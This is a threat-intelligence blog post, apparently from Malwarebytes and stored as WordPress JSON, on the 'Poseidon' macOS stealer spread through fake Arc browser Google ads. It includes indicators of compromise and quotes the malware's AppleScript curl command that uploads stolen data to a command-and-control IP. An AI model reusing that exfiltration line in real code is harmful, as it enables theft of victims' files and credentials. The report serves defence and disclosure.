{"id":24773,"date":"2024-06-27T06:10:05","date_gmt":"2024-06-27T14:10:05","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2024\/06\/27\/news-18503\/"},"modified":"2024-06-27T06:10:05","modified_gmt":"2024-06-27T14:10:05","slug":"news-18503","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2024\/06\/27\/news-18503\/","title":{"rendered":"&#8216;Poseidon&#8217; Mac stealer distributed via Google ads"},"content":{"rendered":"\n<p>On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser. This is the second time in the past couple of months where we see Arc being used as a lure, certainly a sign of its popularity. It was <a href=\"https:\/\/www.threatdown.com\/blog\/threat-actors-ride-the-hype-for-newly-released-arc-browser\/\">previously used to drop a Windows RAT<\/a>, also via Google ads.<\/p>\n<p>The macOS stealer being dropped in this latest campaign is actively being developed as an <a href=\"https:\/\/www.malwarebytes.com\/blog\/threat-intelligence\/2024\/01\/atomic-stealer-rings-in-the-new-year-with-updated-version\">Atomic Stealer<\/a> competitor, with a large part of its code base being the same as its predecessor. Malwarebytes was previously tracking this payload as <strong>OSX.RodStealer<\/strong>, in reference to its author, Rodrigo4. The threat actor rebranded the new project &#8216;Poseidon&#8217; and added a few new features such as looting VPN configurations.<\/p>\n<p>In this blog post, we review the advertisement of the new Poseidon campaign from the cyber crime forum announcement, to the distribution of the new Mac malware via malvertising.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-rodrigo4-launches-new-pr-campaign\">Rodrigo4 launches new PR campaign<\/h2>\n<p>A threat actor known by his handle as Rodrigo4 in the XSS underground forum has been working on a stealer with similar features and code base as the notorious Atomic Stealer (AMOS). The service consists of a malware panel with statistics and a builder with custom name, icon and AppleScript. The stealer offers functionalities reminescent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer, and browser data collector.<\/p>\n<p>In a post last edited on Sunday, June 23, Rodrigo4 announced a new branding for their project:<\/p>\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"607\" height=\"434\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2024\/06\/image_e4dea1.png\" alt=\"\" class=\"wp-image-112835\" \/><figcaption class=\"wp-element-caption\">Forum post by Rodrigo4 on XSS<\/figcaption><\/figure>\n<pre id=\"tw-target-text\" class=\"wp-block-preformatted\">Hello everyone, we have released the V4 update and there are quite a lot of new things.<br>The very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR management. In simple words, people didn\u2019t know who we were.<\/pre>\n<p>Malware authors do need publicity, but we will try to stick to the facts and what we have observed in active malware delivery campaigns.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-distribution-via-google-ads\">Distribution via Google ads<\/h2>\n<p>We saw an ad for the Arc browser belonging to &#8216;Coles &amp; Co&#8217;, linking to the domain name <em>arcthost[.]org<\/em>:<\/p>\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"840\" height=\"511\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2024\/06\/image_d0821a.png\" alt=\"\" class=\"wp-image-112840\" \/><figcaption class=\"wp-element-caption\">Malicious ad for Arc browser via Google search<\/figcaption><\/figure>\n<p>People who clicked on the ad were redirected to <em>arc-download[.]com<\/em>, a completely fake site offering Arc for Mac only:<\/p>\n<figure class=\"wp-block-image aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1092\" height=\"638\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2024\/06\/image_0a217c.png?w=1024\" alt=\"\" class=\"wp-image-112849\" \/><figcaption class=\"wp-element-caption\">Decoy website for Arc<\/figcaption><\/figure>\n<p>The downloaded DMG file resembles what one would expect when installing a new Mac application with the exception of the right-click to open trick to bypass security protections:<\/p>\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"818\" height=\"424\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2024\/06\/image_dd0c0a.png\" alt=\"\" class=\"wp-image-112837\" \/><figcaption class=\"wp-element-caption\">Malicious Arc DMG installer<\/figcaption><\/figure>\n<h2 class=\"wp-block-heading\" id=\"h-connection-to-new-poseidon-project\">Connection to new Poseidon project<\/h2>\n<p>The new &#8220;Poseidon&#8221; stealer contains unfinished code that was <a href=\"https:\/\/x.com\/moonlock_lab\/status\/1805545070264721918\">seen by others<\/a>, and also recently advertised to steal VPN configurations from Fortinet and OpenVPN:<\/p>\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"659\" height=\"185\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2024\/06\/image_7688d9.png\" alt=\"\" class=\"wp-image-112845\" \/><figcaption class=\"wp-element-caption\">Excerpt from forum post featuring new VPN capability<\/figcaption><\/figure>\n<p>More interesting is the data exfiltration which is revealed in the following command:<\/p>\n<pre class=\"wp-block-preformatted\">set result_send to (do shell script \"curl -X POST -H \\\"uuid: 399122bdb9844f7d934631745e22bd06\\\" -H \\\"user: H1N1_Group\\\" -H \\\"buildid: id777\\\" --data-binary @\/tmp\/out.zip http:\/\/ 79.137.192[.]4\/p2p\")<\/pre>\n<p>Navigating to this IP address reveals the new Poseidon branded panel:<\/p>\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"922\" height=\"653\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2024\/06\/image_2ca2fc.png\" alt=\"\" class=\"wp-image-112852\" \/><figcaption class=\"wp-element-caption\">Poseidon panel login page<\/figcaption><\/figure>\n<h2 class=\"wp-block-heading\" id=\"h-conclusion\">Conclusion<\/h2>\n<p>There is an active scene for Mac malware development focused on stealers. As we can see in this post, there are many contributing factors to such a criminal enterprise. The vendor needs to convince potential customers that their product is feature-rich and has low detection from antivirus software.<\/p>\n<p>Seeing campaigns distributing the new malware payload confirms that the threat is real and actively targeting new victims. Staying protected against these threats requires vigilance any time you download and install a new app.<\/p>\n<p><a href=\"https:\/\/www.malwarebytes.com\/mac\">Malwarebytes for Mac<\/a> detects this this &#8216;Poseidon campaign as <em><strong>OSX.RodStealer<\/strong><\/em> and we have already shared information related to the malicious ad with Google. We highly recommend using web protection that blocks ads and malicious websites as your first line of defense. <a href=\"https:\/\/www.malwarebytes.com\/browserguard\">Malwarebytes Browser Guard<\/a> does both effectively.<\/p>\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"886\" height=\"353\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2024\/06\/image_3acb45.png\" alt=\"\" class=\"wp-image-112966\" \/><\/figure>\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"1014\" height=\"710\" src=\"https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2024\/06\/image_2304d9.png\" alt=\"\" class=\"wp-image-112965\" \/><\/figure>\n<h2 class=\"wp-block-heading\" id=\"h-indicators-of-compromise\">Indicators of Compromise<\/h2>\n<p>Google ad domain<\/p>\n<pre class=\"wp-block-preformatted\">arcthost[.]org<\/pre>\n<p>Decoy site<\/p>\n<pre class=\"wp-block-preformatted\">arc-download[.]com<\/pre>\n<p>Download URL<\/p>\n<pre class=\"wp-block-preformatted\">zestyahhdog[.]com\/Arc12645413[.]dmg<\/pre>\n<p>Payload SHA256<\/p>\n<pre class=\"wp-block-preformatted\">c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05<\/pre>\n<p>C2<\/p>\n<pre class=\"wp-block-preformatted\">79.137.192[.]4\/p2p<\/pre>\n<p><a href=\"https:\/\/www.malwarebytes.com\/blog\/cybercrime\/2024\/06\/poseidon-mac-stealer-distributed-via-google-ads\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p> A competitor of the infamous Atomic Stealer targeting Mac users, has just launched a new campaign to lure in more victims. <\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[30077,4503,10454,11658,12040],"class_list":["post-24773","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-atomic-stealer","tag-cybercrime","tag-mac","tag-poseidon","tag-threat-intelligence"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/24773","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=24773"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/24773\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=24773"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=24773"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=24773"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}